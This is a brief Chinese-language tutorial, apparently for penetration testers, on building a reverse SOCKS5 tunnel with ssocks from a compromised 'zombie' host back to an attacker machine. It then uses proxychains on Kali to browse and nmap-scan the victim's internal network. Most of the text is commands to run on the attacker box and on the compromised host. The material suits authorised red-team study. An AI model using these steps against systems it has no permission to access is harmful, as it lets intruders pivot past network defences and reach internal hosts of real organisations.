1. 下载代理工具
http://sourceforge.net/projects/ssocks/
2. 安装
下载成功后,将该工具放到攻击机和肉鸡里面进行安装,放在tmp文件夹下面。
tar zxvf ssocks-0.0.14.tar.gz
cd ssocks-0.0.14
编译文件:./configure && make
进入文件目录: src
3. 攻击机执行操作
./rcsocks -l 攻击机待转端口 -p 中转端口 -vv 即等待远程Sock5服务器访问攻击机的中转端口,创建中转端口和待转端口的连接通道。-vv表示显示详细信息。
4. 肉鸡执行操作
./rssocks -vv -s 攻击机ip+端口 主动连接
5. 利用proxychains进行Socks5代理
apt-get install proxychains(kali已经自带了)
但是kali中,需要修改配置文件: gedit /etc/proxychains.conf,将其中的socks4改成socks5(在ProxyList中把socks4前面输入#注释,然后输入socks5 127.0.0.1 待转端口)
隧道建立好后,可以使用命令访问: proxychains firefox http://内网ip
然后用kali里面的nmap扫描内网: proxychains nmap -Pn -sT 内网地址(要使用tcp扫描)